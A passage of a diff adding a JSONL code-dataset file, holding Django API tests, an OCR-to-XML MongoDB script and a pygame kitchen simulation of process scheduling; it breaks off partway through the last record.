diff --git "a/4832.jsonl" "b/4832.jsonl"
new file mode 100644
--- /dev/null
+++ "b/4832.jsonl"
@@ -0,0 +1,691 @@
+{"seq_id":"399097267","text":"import pytest\nfrom apexselftaught.apps.portfolio.tests.factories import FrameworkFactory, ProgrammingLanguageFactory\n\n\n@pytest.mark.django_db\ndef test_user_can_create_framework(authorized_client, base_url):\n language = ProgrammingLanguageFactory()\n framework = {\n \"framework\": {\n \"language\": language.id,\n \"name\": \"New Framework\",\n \"proficiency\": 8,\n \"is_primary\": True\n }\n }\n response = authorized_client.post(f'{base_url}frameworks', framework, format='json')\n assert response.status_code == 201\n\n\n@pytest.mark.django_db\ndef test_user_can_edit_existing_framework(authorized_client, base_url, user):\n framework = FrameworkFactory(user=user)\n edit_data = {\n \"framework\": {\n \"language\": framework.language.id,\n \"name\": \"New Framework\",\n \"proficiency\": 8,\n \"is_primary\": True\n }\n }\n response = authorized_client.put(f'{base_url}frameworks/{framework.id}', edit_data, format='json')\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_user_can_get_all_frameworks(authorized_client, base_url):\n batch = 3\n FrameworkFactory.create_batch(batch)\n response = authorized_client.get(f'{base_url}frameworks', format='json')\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_user_can_get_single_framework(authorized_client, base_url):\n framework = FrameworkFactory()\n response = authorized_client.get(f'{base_url}frameworks/{framework.id}')\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_user_can_delete_framework(authorized_client, base_url, user):\n frameworks = [FrameworkFactory(user=user) for _ in range(0, 3)]\n framework = frameworks[0]\n response = authorized_client.delete(f'{base_url}frameworks/{framework.id}', format='json')\n assert response.status_code == 200\n response2 = authorized_client.get(f'{base_url}frameworks/{framework.id}', format='json')\n assert response2.status_code == 404\n","sub_path":"apexselftaught/apps/portfolio/tests/test_framework.py","file_name":"test_framework.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"270391647","text":"import lxml.etree as etree\nimport json\nimport sys\nfrom os import listdir\nimport re\nfrom xml.dom.minidom import parseString\nimport ast\nimport binascii\nfrom pymongo import MongoClient\nimport xml.etree.ElementTree as ET\nimport ast\nimport pyxdameraulevenshtein as lev\nimport dicttoxml\n\n\n\n\nimport cv2\nimport numpy as np\nimport json\nimport math\nfrom copy import deepcopy\nfrom ocr_pattern_hypothesis.utils import frame_utils\nfrom ocr_pattern_hypothesis.frames.basic_frames import Word\nfrom ocr_pattern_hypothesis.frames.structure.engine import StructureEngine\nfrom ocr_pattern_hypothesis.frames.structure.text import TextLine\nimport time\nimport os\n\nmongo_ip=\"192.168.60.68\"\nclient_name=\"ami-test\"\n\n\"\"\"\nCreated by @amandubey on 22/01/19\n\"\"\"\n\n\n######################################################################################################################\n\nclass k():\n def __init__(self):\n self.key=0\n def get_key(self):\n self.key=self.key+1\n return self.key\n\ndelta=k()\n\nall_fields={}\nrelationship_pairs={}\n\n\n# This function unrolls the relations in reverse order and puts them in relationship_pairs\n#Using\ndef collect_children(page_id,parents):\n child_list=[]\n #print(\"Parents\",parents)\n for each_child in parents:\n #print(\"Each Child\",each_child)\n #If true field\n if each_child['field']:\n save_name=str(page_id+'_'+each_child['_id'])\n\n else:\n save_name=str(each_child['_id'])\n child_list.append(save_name)\n relationship_pairs[str(delta.get_key())]={'parent':save_name,'child':collect_children(page_id,each_child['children']),'is_link':not(each_child['field'])}\n\n #print('Child List',child_list)\n\n #print(\"*******\")\n\n #print(\"ReL PaIrS\", relationship_pairs)\n return child_list\n\n# Popping and structuring form relationship pairs\n#Using\ndef clean_relationship_pairs(relationship_pairs):\n parents_list=[]\n keys_poped=[]\n links_list=[]\n for k,v in relationship_pairs.items():\n #Put every new parent in parents_list\n if v['parent'] not in parents_list:\n parents_list.append(v['parent'])\n #Put every link in links_list\n if v['is_link']:\n links_list.append(str(1+parents_list.index(v['parent'])))\n else:\n #If already present,it is a child. 
So extend child list of parent\n indx = parents_list.index(v['parent'])\n relationship_pairs[str(1 + indx)]['child'].extend(v['child'])\n keys_poped.append(k)\n for k in keys_poped:\n relationship_pairs.pop(k)\n\n #print(\"Before cleaning\",relationship_pairs)\n relationship_pairs=clean_links(relationship_pairs,links_list)\n #print(\"Links List\",links_list)\n #print(\"After cleaning\",relationship_pairs)\n\n return relationship_pairs\n\n# Question????????????????????\ndef clean_links(relationship_pairs,links_list):\n #print(\"Rel pairs b4 cleaning\",relationship_pairs)\n for enum in links_list:\n for each_enum,val in relationship_pairs.items():\n if relationship_pairs[enum]['parent'] in val['child']:\n val['child'].extend(relationship_pairs[enum]['child'])\n val['child'].pop(val['child'].index(relationship_pairs[enum]['parent']))\n for k in links_list:\n relationship_pairs.pop(k)\n\n # print(\"Links List\",links_list)\n # print(\"Rel pairs after cleaning\", relationship_pairs)\n return relationship_pairs\n\n#Using\ndef collect_all_fileds(page_id,fields):\n for each_data in fields:\n each_data['children']=[]\n all_fields[page_id+'_'+each_data['_id']]=each_data\n\n\n#Using\ndef create_relation_fields(all_fields,relationship_pairs):\n poped_ids=[]\n field_list=[]\n for key_enum,tree_relation in relationship_pairs.items():\n for child_id in tree_relation['child']:\n all_fields[tree_relation['parent']]['children'].append(all_fields[child_id])\n poped_ids.append(child_id)\n #print()\n for popid in poped_ids:\n all_fields.pop(popid)\n\n for k,v in all_fields.items():\n field_list.append(v)\n return field_list\n\n\n##Using\ndef get_all_fields(mongo_ip,client_name,document_id):\n\n client = MongoClient(mongo_ip)\n db = client[client_name]\n relations = list(db.pageRelations.find({\"document_id\": document_id}))\n fields = list(db.fields.find({\"documentId\": document_id}))\n\n for enum,val in enumerate(relations):\n collect_children(val[\"page_id\"],val[\"relations\"])\n\n clean_relationship_pairs(relationship_pairs)\n for enum,val in enumerate(fields):\n collect_all_fileds(val[\"pageId\"],val['fields'])\n field_list=create_relation_fields(all_fields,relationship_pairs)\n #print(\"Field List\",field_list)\n\n return field_list\n\n\n# Helper function to extract specific attributes according to field type for xml string\n# for each parent and corresponding children and forming the xml structure\n#Using\ndef get_field_xml(field,xml_data,print_flag=False):\n\n label_and_value = ast.literal_eval(field['value'])\n\n if len(field['children']) > 0:\n for child in field['children']:\n b = ET.SubElement(xml_data, 'field')\n get_field_xml(child,b,print_flag=False)\n\n if field['type'] == \"Key-value pair\":\n value_word = label_and_value[1]['key']\n\n elif field['type'] == \"group_frame\" :\n if (len(label_and_value)==2) :\n value_word = label_and_value[1]['key']\n else:\n value_word = label_and_value[0]['key']\n\n else:\n value_word = label_and_value[0]['key']\n\n xml_data.set('value',value_word)\n xml_data.set('tag',field['tag'])\n # if print_flag:\n #\n # lis.append(ET.tostring(xml_data).decode('utf-8'))\n # lis.append(xml_data('utf-8'))\n\n\n\n return xml_data\n\n#Using\ndef format_fields_for_xml(all_Fields):\n all_field_xml_data=''\n print(\"AllFields\",all_Fields)\n for field in all_Fields:\n # Create proper xml string with parents and children in order for all relations present in all_fields\n root = ET.Element('field')\n al = ET.tostring(get_field_xml(field, root, print_flag=True))\n 
all_field_xml_data += al.decode(\"utf-8\")\n # all_field_xml_data+=get_field_xml(field)\n\n all_field_xml_data+=''\n\n return all_field_xml_data\n\n\n\n\n#######################################################################################################################\n\ndef get_page_coordinates_from_coordinates_data(coordinates_data_dict):\n \"\"\"\n converts x,y,width,height to top,left,bottom,right\n :param coordinates_data_dict: dictionary having x,y,width,height values\n :return: tuple in top,left,bottom,right format\n \"\"\"\n return (coordinates_data_dict['y'],coordinates_data_dict['x'],(coordinates_data_dict['y']\n +coordinates_data_dict['height']),(coordinates_data_dict['x']+coordinates_data_dict['width']))\n\ndef get_coordinates_data_from_page_coordinates(page_coordinates):\n \"\"\"\n converts top,left,bottom,right to x,y,width,height\n :param page_coordinates: list in top,left,bottom,right format\n :return: dictionary as x,y,width,height\n \"\"\"\n print(\"page_coordinates\",page_coordinates)\n return {'x':page_coordinates[1],'y':page_coordinates[0],'width':(page_coordinates[3]-page_coordinates[1]),\n 'height':(page_coordinates[2]-page_coordinates[0])}\n\ndef is_coordinates_overlapping(rect1, rect2):\n \"\"\"\n created by @amandubey on 13/11/18\n returns if two sets of coordinates are overlapping or not\n :param rect1: first set of coordinates\n :param rect2: second set of coordinates\n :return: True when two sets of coordinates are overlapping otherwise false\n \"\"\"\n left = rect2[2] < rect1[0]\n right = rect1[2] < rect2[0]\n bottom = rect2[3] < rect1[1]\n top = rect1[3] < rect2[1]\n if top or left or bottom or right:\n return False\n else: # rectangles intersect\n return True\n\n\ndef get_textlines(evidence,image):\n \"\"\"\n Gives all textlines\n Any change to reflect in all the data present should be here\n \"\"\"\n s_engine = StructureEngine((\n TextLine.generate,\n ))\n word_patches_dict = {}\n structures = []\n for each_evidence in evidence['words']:\n # print(\"txtline keys :\",each_evidence.keys())\n # print(each_evidence['coordinate']['y'])\n # print(each_evidence['coordinate']['x'])\n # print(each_evidence['coordinate']['width'])\n # print(each_evidence['coordinate']['height'])\n label_word = str(each_evidence['label'])\n\n coordinates = (each_evidence['coordinate']['y'],each_evidence['coordinate']['x'],(each_evidence['coordinate']['height'] + each_evidence['coordinate']['y']),(each_evidence['coordinate']['width']+each_evidence['coordinate']['x']))\n\n xx=re.findall(r'[a-zA-Z0-9-+=-_]+', label_word)\n\n if len(xx)<1:\n label_word=\" \"\n\n label_word=label_word.replace('\"',\"'\")\n word_patches_dict[coordinates] = label_word\n\n try:\n structures = s_engine.run(image, word_args=(word_patches_dict,))\n except IndexError:\n structures = []\n structures=structures.filter(TextLine)\n print('no. 
of textlines',len(structures))\n return structures\n\ndef textline_intersection(rect1,rect2):\n \"\"\"\n Get new coordinates if two blocks are overlapping\n :return: merged coordinates\n \"\"\"\n t = min((rect1[0], rect2[0]))\n l = min((rect1[1], rect2[1]))\n b = max((rect1[2], rect2[2]))\n r = max((rect1[3], rect2[3]))\n return [t, l,b, r]\n\n\ndef fetch_textline_xml_data(value_word,tag,text_root,label_word=\"\",has_label=False):\n \"\"\"\n\n :param value_word: value\n :param tag: tag\n :param label_word: label\n :param has_label: kv pair\n :param ends_here: child\n :param is_end_of_data: end of total text node block\n :return: formatted text node string\n \"\"\"\n\n if has_label:\n text_root.set('key', str(label_word))\n\n text_root.set('value', str(value_word))\n text_root.set('tag', str(tag))\n\n return ET\n\n\n\n\ndef fetch_textline_xml_data_with_children(value_word,tag,text_root) :\n\n text_root.set('value',value_word)\n text_root.set('tag',tag)\n\n return text_root\n\n#Using\n\n# Need to concentrate here\ndef create_textline_level_txtNodes(page_structure,tables_list,fields_list):\n finalised_page_structures=\"\"\n textline_coordinates=[0,0,0,0]\n for textline in page_structure:\n is_finalised_page_structures=True\n textline_coordinates[0] = (textline.coordinates[0][1])\n textline_coordinates[1] = (textline.coordinates[0][0])\n textline_coordinates[2] = (textline.coordinates[1][1])\n textline_coordinates[3] = (textline.coordinates[1][0])\n for each_table in tables_list:\n if is_coordinates_overlapping(textline_coordinates,get_page_coordinates_from_coordinates_data(each_table['coordinates'])):\n is_finalised_page_structures=False\n\n if is_finalised_page_structures:\n\n text_root = ET.Element('txtNode')\n already_has_field=False\n for each_field in fields_list:\n\n if is_coordinates_overlapping(textline_coordinates,get_page_coordinates_from_coordinates_data(each_field['coordinate'])):\n has_label=False\n label_and_value = ast.literal_eval(each_field['value'])\n value_word,label_word='',''\n if each_field['type']==\"Key-value pair\":\n has_label=True\n label_word = label_and_value[0]['key']\n value_word=label_and_value[1]['key']\n\n\n#######################################################\n # Added by Ayan\n elif each_field['type']==\"group_frame\":\n if(len(label_and_value)==2) :\n has_label = True\n label_word = label_and_value[0]['key']\n value_word = label_and_value[1]['key']\n else :\n value_word = label_and_value[0]['key']\n label_word=\"\"\n\n#######################################################\n\n elif each_field['type']==\"\": #Standalone\n value_word = label_and_value[0]['key']\n label_word=\"\"\n\n\n #If the particular field(each_field) exactly matches with the text line\n if not lev.normalized_damerau_levenshtein_distance(value_word,str(textline)):\n fps = fetch_textline_xml_data(value_word=value_word,tag=each_field['tag'],\n label_word=label_word,has_label=has_label, text_root=text_root)\n fps = fps.tostring(text_root).decode(\"utf-8\")\n finalised_page_structures+= fps\n already_has_field=True\n\n break\n\n else:\n if not already_has_field:\n # finalised_page_structures+=fetch_textline_xml_data_with_children(value_word=str(textline),tag=\"\",text_root=text_root)\n text_root = fetch_textline_xml_data_with_children(value_word=str(textline),tag=\"\",text_root=text_root)\n already_has_field=True\n #print(\"Already has field :\",each_field['tag'])\n b = ET.SubElement(text_root,'txtNode')\n fetch_textline_xml_data(value_word=value_word,tag=each_field['tag'],\n 
label_word=label_word,has_label=has_label, text_root=b)\n\n fps = ET.tostring(text_root).decode(\"utf-8\")\n finalised_page_structures+= fps\n\n #Logic if field not present\n if not already_has_field:\n fps = fetch_textline_xml_data(value_word=str(textline), tag=\"\", text_root=text_root)\n fps = fps.tostring(text_root).decode(\"utf-8\")\n finalised_page_structures += fps\n\n\n finalised_page_structures+=''\n return finalised_page_structures\n\ndef check_tag_key(data_dict):\n if 'tag' not in data_dict.keys():\n data_dict['tag']=['']\n return data_dict\n\ndef format_xml_tag_for_table(tags):\n return ','.join(tags)\n\ndef fetch_table_row_xml_data(inside_table_data,headers,type='row'):\n inside_table_xml=''\n for enum,each_itter_data in enumerate(inside_table_data):\n each_itter_data=check_tag_key(each_itter_data)\n if type=='row':\n inside_table_xml+=''\n inside_table_xml+=fetch_table_row_xml_data(each_itter_data['cells'],headers,type='column')\n inside_table_xml+=''\n elif type=='column':\n inside_table_xml+=''\n\n return inside_table_xml\n\ndef check_table_for_headers(first_row):\n headers=[]\n hasHeader=False\n if first_row['isHeader']:\n for cell in first_row['cells']:\n headers.append(cell['value'])\n hasHeader=True\n else:\n for cell in first_row['cells']:\n headers.append('')\n return hasHeader,headers\n\ndef create_txtNodes_for_table(all_tables_list):\n if len(all_tables_list)<1:\n return \"\"\n table_data_xml=''\n for each_table in all_tables_list:\n # print('#'*30)\n table_data_xml+='
'\n hasHeaders,headers=check_table_for_headers(each_table['tableRows'][0])\n if hasHeaders:\n table_data_xml+=fetch_table_row_xml_data(each_table['tableRows'][1:],headers)\n else:\n table_data_xml+=fetch_table_row_xml_data(each_table['tableRows'],headers)\n\n\n table_data_xml+='
'\n\n table_data_xml+=''\n # print(\"all tables\")\n # print(table_data_xml)\n\n return table_data_xml\n\n\ndef fetch_page_level_info(mongo_ip,client_name,document_id,image_path=\"/home/amandubey/Documents/\"):\n client = MongoClient(mongo_ip)\n db = client[client_name]\n # all_document_related_pages_info = list(db.pages.find({\"documentId\": document_id}))\n all_document_related_pages_info = list(db.pages.find({\"documentId\": document_id}).sort('pageNumber'))\n\n all_document_related_fields = list(db.fields.find({\"documentId\": document_id}).sort('pageNumber'))\n all_pages_xml=\"\"\n xml_list=[]\n for enum,each_page in enumerate(all_document_related_pages_info):\n each_page_xml=''\n\n for each_field in all_document_related_fields:\n if each_field['path']==each_page['path']:\n page_related_fields=each_field\n break\n # page_image=cv2.imread(image_path+document_id+'/'+each_page['path'])\n page_image=cv2.imread(\"/Users/ayanbask/Desktop/IDP/flower_image.jpg\")\n page_structure=get_textlines(each_page,page_image)\n each_page_xml +=create_textline_level_txtNodes(page_structure,page_related_fields['tables'],page_related_fields['fields'])\n each_page_xml+=create_txtNodes_for_table(page_related_fields['tables'])\n each_page_xml+=''\n all_pages_xml+=each_page_xml\n # for i in range(len(xml_list)-1,-1,-1):\n # all_pages_xml+=xml_list[i]\n all_pages_xml+=''\n # print(\"all page XML IS\")\n # print(all_pages_xml)\n return all_pages_xml\n\n########################################################################################################################\n\ndef combine_json_parse_xml( document_id):\n data_list = []\n data = {}\n # document_id=uploadpath.split('/')[-1]\n\n\n #final_data_xml -> Final structured xml string\n final_data_xml=''\n # Fetching all fields by document\n data['all_Fields']=get_all_fields(mongo_ip,client_name,document_id)\n # Cleaning the fields by extracting only required info\n final_data_xml+=format_fields_for_xml(data['all_Fields'])\n final_data_xml+=fetch_page_level_info(mongo_ip,client_name,document_id)\n final_data_xml+=''\n\n print('final_data_xml')\n print(final_data_xml)\n f=open(\"xml_data.xml\",'w')\n f.write(final_data_xml)\n f.close()\n\n # print(data)\n #\n # xml = dicttoxml.dicttoxml(data)\n # xml_decoded = xml.decode()\n # print(xml_decoded)\n # xml_bytes = bytes(parseString(xml_decoded).toprettyxml(indent=' ' * 4), 'utf-8')\n # save_info=\"/home/amandubey/Documents/All Output Images/ami xml data/\"\n # with open(save_info+str(len(os.listdir(save_info))) + \"_data.xml\", \"wb\") as fs:\n # fs.write(xml_bytes)\n\nif __name__ == '__main__':\n # a={'as':['wq','ew','2332','asad','lsakd']}\n # print(a['as'][2:])\n # exit()\n # uploadpath = sys.argv[1]\n # uploadpath = \"/home/amandubey/Downloads/5c530a120ed0a632bcaf797c/\"\n doc_id=\"5d427bc96f237378706564e4\"\n combine_json_parse_xml(doc_id)\n print(\"success\")\n\n# paragraphs_text = detect_paragraph(img, evidence, 1.5,False,2)","sub_path":"combine_json_ETree.py","file_name":"combine_json_ETree.py","file_ext":"py","file_size_in_byte":19425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"546425560","text":"import cola\nimport time\nfrom procesos import *\nimport recursos as rs\nimport queue\nimport threading\nimport numpy as np\nimport pygame\nfrom pygame.sprite import Sprite\nfrom pygame.locals import *\nimport util\nimport sys, pygame, util\nfrom receta import Receta\nfrom recursos import CuchillosIma\nfrom recursos import LicuadoraIma\nfrom recursos import HornoIma\nfrom pizarra import Pizarra\n\nsize = width, height = 900, 712\nscreen = pygame.display.set_mode(size)\n\nclass Procesador(threading.Thread):\n\tdef __init__(self,idProcesador,*args):\n\t\tthreading.Thread.__init__(self)\n\t\tself.idProcesador=idProcesador\n\t\tself.proceso=None\n\t\tself.lis=cola.Cola()\n\t\tself.ter=cola.Cola()\n\t\tself.blo=cola.Cola()\n\t\tself.sus=cola.Cola()\n\t\tself._args=args\n\t\tself.uso=True\n\t\tself.minIter=50\n\n\tdef __str__(self):\n\t\treturn str(self.idProcesador)\n\n\tdef run(self):\n\t\twhile self.uso:\n\t\t\tself.usarProcesador(*self._args)\n\n\tdef usarProcesador(self,q):\n\t\twhile not self.proceso==None or not q.empty() or not self.lis.es_vacia() or not self.sus.es_vacia() or not self.blo.es_vacia() or self.minIter>0:\n\t\t\ttime.sleep(2)\n\t\t\tself.minIter-=1\n\t\t\tif not q.empty(): self.asignar(q.get())\n\t\t\tself.lis.ordenar()\n\t\t\tif not self.lis.es_vacia() and self.proceso==None:\n\t\t\t\tposible=self.lis.desencolar()\n\t\t\t\tif posible.recurso.libre:\n\t\t\t\t\tself.ocupado=True\n\t\t\t\t\tself.proceso=posible\n\t\t\t\t\tself.proceso.recurso.utilizar()\n\t\t\t\t\tself.proceso.estado=3\n\t\t\t\telse:\n\t\t\t\t\tposible.bloquear()\n\t\t\t\t\tself.blo.encolar(posible)\n\t\t\telif not self.lis.es_vacia() and not self.proceso==None:\n\t\t\t\tposible=self.lis.desencolar()\n\t\t\t\tif self.proceso.t>posible.t and posible.recurso.libre:\n\t\t\t\t\tself.proceso.suspender()\n\t\t\t\t\tself.sus.encolar(self.proceso)\n\t\t\t\t\tself.proceso=posible\n\t\t\t\t\tself.proceso.recurso.utilizar()\n\t\t\t\telse:\n\t\t\t\t\tself.lis.encolar(posible)\n\n\t\t\tself.contarColaBlo()\n\t\t\tself.contarColaLis()\n\t\t\tself.revisarColaSus()\n\t\t\tself.revisarColaBlo()\n\n\t\t\tif not self.proceso==None:\n\t\t\t\tself.proceso.procesar()\n\t\t\t\tif self.proceso.t==0:\n\t\t\t\t\tself.proceso.recurso.liberar()\n\t\t\t\t\tprint(\"\\nterminando proceso\",self.proceso,\"en el procesador\",self,\",sus\",self.proceso.sus,\",lis\",self.proceso.lis,\",blo\",self.proceso.blo,\",zona critica\",self.proceso.zc)\n\t\t\t\t\tself.proceso.estado=4\n\t\t\t\t\tself.ter.encolar(self.proceso)\n\t\t\t\t\tself.proceso=None\n\t\t\t\t\tq.task_done()\n\n\t\tprint(\"termino el procesador\",self,\"lista de tareas completadas en este procesador:\")\n\t\tfor i in range(self.ter.tam):\n\t\t\tprint(self.ter.desencolar())\n\t\tself.uso=False\n\n\tdef revisarColaSus(self):\n\t\ttam = self.sus.tam\n\t\tfor i in range(tam):\n\t\t\tn=self.sus.desencolar()\n\t\t\tn.tr-=1\n\t\t\tn.sus+=1\n\t\t\tif n.tr==0:\n\t\t\t\tself.asignar(n)\n\t\t\t\tprint(\"\\nse saco el proceso\",n,\"de la cola de suspendidos y entro a la cola de listo\")\n\t\t\telse:\n\t\t\t\tself.sus.encolar(n)\n\n\tdef revisarColaBlo(self):\n\t\tfor i in range(self.blo.tam):\n\t\t\tposible=self.blo.desencolar()\n\t\t\tif posible.recurso.libre:\n\t\t\t\tself.asignar(posible)\n\t\t\t\tprint(\"\\nse saco el proceso\",posible,\" de la cola de bloqueados y entro en la cola de listos\")\n\t\t\telse:\n\t\t\t\tself.blo.encolar(posible)\n\n\tdef contarColaLis(self):\n\t\ttam = self.lis.tam\n\n\t\tfor i in 
range(tam):\n\t\t\tn=self.lis.desencolar()\n\t\t\tn.lis+=1\n\t\t\tself.lis.encolar(n)\n\n\n\tdef contarColaBlo(self):\n\t\ttam = self.blo.tam\n\t\tfor i in range(self.blo.tam):\n\t\t\tn=self.blo.desencolar()\n\t\t\tn.blo+=1\n\t\t\tself.blo.encolar(n)\n\n\tdef asignar(self,proceso):\n\t\tproceso.estado=0\n\t\tself.lis.encolar(proceso)\n\nclass cliente:\n\tdef __init__(self):\n\t\tself.numPo=0\n\t\tself.numMa=0\n\t\tself.numEn=0\n\n\t\tself.recursos=[rs.Horno(),rs.Cuchillos(),rs.Licuadora()]\n\t\tself.cola1=queue.Queue()\n\t\tself.cola2=queue.Queue()\n\t\tself.cola3=queue.Queue()\n\n\t\tself.colaProcesadores=queue.Queue()\n\t\tself.procesador1=Chef((width-900,height),1,self.cola1)\n\t\tself.procesador2=Chef((width-700,height),2,self.cola2)\n\t\tself.procesador3=Chef((width-500,height),3,self.cola3)\n\n\t\tpygame.init()\n\t\tpygame.mixer.init()\n\n\t\tself.fondo = pygame.image.load(\"imagenes/cocina.png\")\n\t\tself.intro = pygame.image.load(\"imagenes/intro.png\")\n\t\tself.fondorect = self.fondo.get_rect()\n\t\tself.introrect = self.intro.get_rect()\n\n\t\tpygame.display.set_caption( \"Chef Race (Universidad Distrital)\" )\n\t\tself.pizarra = pygame.image.load(\"imagenes/pizarra.png\")\n\t\tself.sInicio = util.cargar_sonido('sonidos/inicio.wav')\n\t\tself.sHorno = util.cargar_sonido('sonidos/horno.wav')\n\t\tself.sCuchillo = util.cargar_sonido('sonidos/cuchillo.wav')\n\t\tself.sLicuadora = util.cargar_sonido('sonidos/licuadora.wav')\n\t\tself.sPrincipal = util.cargar_sonido('sonidos/principal.wav')\n\n\t\tself.pizarra1 = Pizarra((width-900,height))\n\t\tself.pizarra2 = Pizarra((width-700,height))\n\t\tself.pizarra3 = Pizarra((width-500,height))\n\t\tself.receta1 = Receta((width,height))\n\t\tself.receta2 = Receta((width+200,height))\n\t\tself.receta3 = Receta((width+400,height))\n\n\t\tself.comida1 = PolloConPapas(000,self.recursos[0],size)\n\t\tself.comida2 = Ensalada(111,self.recursos[1],size)\n\t\tself.comida3 = Malteada(222,self.recursos[2],size)\n\n\t\tself.listaChefs = [self.procesador1, self.procesador2, self.procesador3]\n\t\tself.listaPizarras = [self.pizarra1, self.pizarra2, self.pizarra3]\n\t\tself.listaRecetas = [self.receta1, self.receta2, self.receta3]\n\t\tself.listaComida = [self.comida1, self.comida2, self.comida3]\n\t\tself.cuchillos = CuchillosIma(size)\n\t\tself.licuadora = LicuadoraIma(size)\n\t\tself.horno = HornoIma(size)\n\n\t\tself.reloj = pygame.time.Clock()\n\t\tself.fuente1 = pygame.font.Font(None,70)\n\t\tself.fuente2 = pygame.font.Font(None,25)\n\t\tself.textoBienvenida = self.fuente1.render(\"Bienvenido a Chef Race UD\", 1, (255,255,255))\n\t\tself.textoAutor1 = self.fuente2.render(\"Marlon Arias\", 1, (0,0,0))\n\t\tself.textoAutor2 = self.fuente2.render(\"David Amado\", 1, (0,0,0))\n\t\tself.textoAutor3 = self.fuente2.render(\"Realizado por:\", 1, (0,0,0))\n\n\tdef iniciar(self):\n\n\t\tself.sInicio.play()\n\t\taux = 3\n\n\t\twhile aux > 0:\n\t\t\tscreen.blit(self.intro, self.introrect)\n\t\t\tscreen.blit(self.textoAutor1,(width-170,height-680))\n\t\t\tscreen.blit(self.textoAutor2,(width-170,height-660))\n\t\t\tscreen.blit(self.textoAutor3,(width-170,height-700))\n\t\t\tscreen.blit(self.textoBienvenida,((width-880, (height/2)+30)))\n\t\t\tpygame.display.update()\n\t\t\ttime.sleep(1)\n\t\t\taux=aux-1\n\n\t\tself.sPrincipal.play(1)\n\n\t\tself.procesador1.start()\n\t\tself.procesador2.start()\n\t\tself.procesador3.start()\n\t\tself.hiloAnimacion = threading.Thread(name='Animacion', target = self.pintar)\n\t\tself.hiloEventos = threading.Thread(name='Animacion', 
target = self.capturarEventos)\n\t\t#self.hiloEventos.daemon=True\n\t\tself.hiloEventos.start()\n\t\tself.hiloAnimacion.daemon=True\n\t\tself.hiloAnimacion.start()\n\t\t\n\t\tself.cola1.join()\n\t\tself.cola2.join()\n\t\tself.cola3.join()\n\t\tself.hiloAnimacion.join()\n\t\tself.hiloEventos.join()\n\n\tdef capturarEventos(self):\n\t\twhile self.procesador1.uso or self.procesador2.uso or self.procesador3.uso:\n\t\t\tfor event in pygame.event.get():\n\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit()\n\n\t\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\t\tprint(\"Evento ratonBtn capturado\")\n\t\t\t\t\tfor x in range(700, 760):\n\t\t\t\t\t\tfor y in range(282, 342):\n\t\t\t\t\t\t\tproceso = Malteada(self.numMa,self.recursos[2],size)\n\t\t\t\t\t\t\tself.numMa+=1\n\t\t\t\t\t\t\testado=\"trabajandoLicuadora1\"\n\t\t\t\t\t\t\tif event.button == 1 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola1.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador1.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra1.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click izq\")\n\t\t\t\t\t\t\telif event.button == 2 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola2.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador2.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra2.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click cent\")\n\t\t\t\t\t\t\telif event.button == 3 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola3.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador3.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra3.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click der\")\n\n\t\t\t\t\tfor x in range(700, 760):\n\t\t\t\t\t\tfor y in range(27, 87):\n\t\t\t\t\t\t\tproceso=PolloConPapas(self.numPo,self.recursos[0],size)\n\t\t\t\t\t\t\tself.numPo+=1\n\t\t\t\t\t\t\testado=\"trabajandoHorno1\"\n\t\t\t\t\t\t\tif event.button == 1 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola1.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador1.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra1.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click izq\")\n\t\t\t\t\t\t\telif event.button == 2 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola2.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador2.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra2.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click cent\")\n\t\t\t\t\t\t\telif event.button == 3 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola3.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador3.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra3.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click der\")\n\n\t\t\t\t\tfor x in range(700, 750):\n\t\t\t\t\t\tfor y in range(137, 197):\n\t\t\t\t\t\t\tproceso=Ensalada(self.numEn,self.recursos[1],size)\n\t\t\t\t\t\t\tself.numEn+=1\n\t\t\t\t\t\t\testado=\"trabajandoCuchillo1\"\n\t\t\t\t\t\t\tif event.button == 1 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola1.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador1.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra1.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click izq\")\n\t\t\t\t\t\t\telif event.button == 2 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola2.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador2.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra2.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click cent\")\n\t\t\t\t\t\t\telif event.button == 3 and event.pos == (x, 
